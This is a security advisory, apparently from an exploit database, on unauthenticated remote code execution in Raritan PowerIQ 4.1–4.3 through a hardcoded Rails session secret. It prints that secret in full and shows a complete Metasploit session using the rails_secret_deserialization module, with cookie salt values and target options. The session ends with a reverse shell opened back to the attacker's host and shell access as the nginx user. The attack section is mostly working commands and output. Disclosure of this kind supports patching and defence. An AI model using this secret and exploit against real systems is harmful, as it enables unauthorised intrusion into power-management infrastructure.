Raritan PowerIQ 4.1 / 4.2 / 4.3 Code Execution

2015.03.13
Credit: Brandon Perry
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Raritan PowerIQ versions 4.1, 4.2, and 4.3 ship with a Rails 2 web interface with a hardcoded session secret of 8e238c9702412d475a4c44b7726a0537. This can be used to achieve unauthenticated remote code execution as the nginx user on vulnerable systems. msf exploit(rails_secret_deserialization) > show options Module options (exploit/multi/http/rails_secret_deserialization): Name Current Setting Required Description ---- --------------- -------- ----------- COOKIE_NAME no The name of the session cookie DIGEST_NAME SHA1 yes The digest type used to HMAC the session cookie HTTP_METHOD GET yes The HTTP request method (GET, POST, PUT typically work) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RAILSVERSION 3 yes The target Rails Version (use 3 for Rails3 and 2, 4 for Rails4) RHOST 192.168.0.20 yes The target address RPORT 443 yes The target port SALTENC BAh7CUkiCXNrZXkGOgZFRkkiFTgzMzVmNDY2ZDdmOTI2Y2IGOwBUSSINbGljZW5zZWQGOwBGVEkiD3Nlc3Npb25faWQGOwBUSSIlNGJlNzA2Nzk2NWFjYjFmNzU2ZThiY2IyNGVkNWM0MDMGOwBUSSIOcmV0dXJuX3RvBjsARiIGLw== yes The encrypted cookie salt SALTSIG 42df31d8a91b45e5ad3e9f3213dc5d6859df1cf8 yes The signed encrypted cookie salt SECRET 8e238c9702412d475a4c44b7726a0537 yes The secret_token (Rails3) or secret_key_base (Rails4) of the application (needed to sign the cookie) TARGETURI /login/login yes The path to a vulnerable Ruby on Rails application VALIDATE_COOKIE true no Only send the payload if the session cookie is validated VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Automatic msf exploit(rails_secret_deserialization) > exploit [*] Started reverse handler on 192.168.0.19:4444 [*] Checking for cookie [*] Adjusting cookie name to _session_id [+] SECRET matches! Sending exploit payload [*] Sending cookie _session_id [*] Command shell session 1 opened (192.168.0.19:4444 -> 192.168.0.20:43729) at 2015-03-11 19:45:20 -0500 id uid=498(nginx) gid=498(nginx) groups=498(nginx),100(users) -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website

References:

http://www.volatileminds.net


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top